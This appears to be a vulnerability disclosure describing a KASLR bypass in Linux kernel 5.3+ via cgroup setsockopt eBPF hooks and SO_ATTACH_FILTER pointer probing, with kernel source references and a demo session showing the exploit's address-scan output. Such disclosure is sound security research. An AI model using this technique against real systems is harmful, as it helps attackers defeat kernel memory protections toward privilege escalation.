From linux kernel 5.3, user who has CAP_NET_ADMIN capability can attach ebpf filter to setsockopt() syscall by using BPF_CGROUP_SETSOCKOPT type.
This feature hooks setsockopt() syscall if the socket is under certain cgroup(root cgroup is okay).
If any filter is attached to cgroup, attacker can check kernel address is mapped or not ( and use it to bypass KASLR ).
-
Linux kernel version is 5.3 or higher.
-
User who has CAP_NET_ADMIN attach ebpf filter to setsockopt() syscall. ( any filter is okay, but attacker should be able to pass the attached filter. )
-
Attacker already have unprivileged shell.
Attacker is able to know what kernel addresses(pages) are actually mapped.
So it can be used to bypass KASLR.
In the setsockopt() syscall, BPF_CGROUP_RUN_PROG_SETSOCKOPT() function checks if setsockopt filter is attached or not.
https://elixir.bootlin.com/linux/v5.3.18/source/net/socket.c#L2062
https://elixir.bootlin.com/linux/v5.3.18/source/include/linux/bpf-cgroup.h#L297 ( cgroup_bpf_enabled flag is incremented when privileged user attaches ebpf filter. )
If it's attached, pass arguments to the attached ebpf filter, and check if return value is not 0. ( CAP_NET_ADMIN user can flexibly restrict setsockopt() syscall parameter. )
https://elixir.bootlin.com/linux/v5.3.18/source/kernel/bpf/cgroup.c#L1007
Before running ebpf filter, kernel actually save arguments to kernel memory, because user can change actual value at any time. ( even after passing the filter. )
https://elixir.bootlin.com/linux/v5.3.18/source/kernel/bpf/cgroup.c#L1001
If the arguments are saved in kernel memory, copy_from_user() won't work. Because it's not userland address already.
To avoid this, kernel call set_fs(KERNEL_DS) and temporarily expand userland address range. (This hack is sometimes used to call syscall in kernel land.)
https://elixir.bootlin.com/linux/v5.3.18/source/net/socket.c#L2074
It's basically okay, because optval is definitely kernel memory pointer.
But if *optval also has any pointer ( which is expected to be in userland ) in its structure, it's abusable.
Because if an attacker set malicious kernel pointer as pointer in the structure, copy_from_user() works correctly because of set_fs(KERNEL_DS).
The optval of SO_ATTACH_FILTER has such pointer.
Below code copy optval to fprog.
https://elixir.bootlin.com/linux/v5.3.18/source/net/core/sock.c#L996
But fprog has pointer.
https://elixir.bootlin.com/linux/v5.3.18/source/include/uapi/linux/filter.h#L31
If attacker set kernel pointer as filter member, the kernel will load filter from the kernel pointer and validate if it's valid BPF filter.
https://elixir.bootlin.com/linux/v5.3.18/source/net/core/filter.c#L1476 ( load filter )
https://elixir.bootlin.com/linux/v5.3.18/source/net/core/filter.c#L1297 ( check filter )
If the kernel pointer is invalid, the kernel will return EFAULT.
If the kernel pointer is valid, the validation will basically fail because it's not a valid bpf filter.
Then kernel will return EINVAL.
So an attacker now be able to know which address is valid(return EINVAL) or invalid(return EFAULT)
- Check kernel version. ( Exploit works with kernel upgraded/rebooted Ubuntu 18.04 )
garyo@garyo:~$ apt list "linux-image*" --installed | grep -v dbg
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
Listing...
linux-image-5.3.0-53-generic/bionic-updates,bionic-security,now 5.3.0-53.47~18.04.1 amd64 [installed]
- Set filter to root cgroup. ( to meet precondition ) ↓This filter always return 1.
garyo@garyo:~$ sudo ./set_meaningless_filter /sys/fs/cgroup/unified/
Output from kernel verifier:
0: (b7) r0 = 1
1: (95) exit
processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
- Run exploit _text is 0xffffffff9d200000 and exploit shows from there's valid kernel address from 0xffffffff9d200000. ( It will take some minutes, if you want to check quickly, change interval from 0x100000 to bigger number. )
garyo@garyo:~$ ./kaslr_bypass 0xffff000000000000 0xffffffffffff0000 0x100000
Checking addr from 0xffff000000000000 to 0xffffffffffff0000 by 0x100000bytes
0xffff000000000000 : INvalid
0xffff95e940000000 : valid
0xffff95e9c0000000 : INvalid
0xffffb00a80000000 : valid
0xffffb00a80600000 : INvalid
0xffffb00a80700000 : valid
0xffffb00a80800000 : INvalid
0xffffb00a88000000 : valid
0xffffb00a90000000 : INvalid
0xffffd00a7be00000 : valid
0xffffd00a7fe00000 : INvalid
0xffffe88b00000000 : valid
0xffffe88b02000000 : INvalid
0xfffffe0000000000 : valid
0xfffffe0000600000 : INvalid
0xfffffe0000700000 : valid
0xfffffe0000800000 : INvalid
0xfffffe0000900000 : valid
0xfffffe0000a00000 : INvalid
0xfffffe0000d00000 : valid
0xfffffe0000e00000 : INvalid
0xfffffe0000f00000 : valid
0xfffffe0001000000 : INvalid
0xfffffe0001100000 : valid
0xfffffe0001200000 : INvalid
0xfffffe0001300000 : valid
0xfffffe0001400000 : INvalid
0xffffffff9d200000 : valid
0xffffffff9e100000 : INvalid
0xffffffff9e200000 : valid
0xffffffff9e700000 : INvalid
0xffffffff9e800000 : valid
0xffffffff9eb00000 : INvalid
0xffffffff9ee00000 : valid
0xffffffff9f400000 : INvalid
0xffffffffc0400000 : valid
0xffffffffc0900000 : INvalid
garyo@garyo:~$ sudo cat /proc/kallsyms | grep "T _text"
ffffffff9d200000 T _text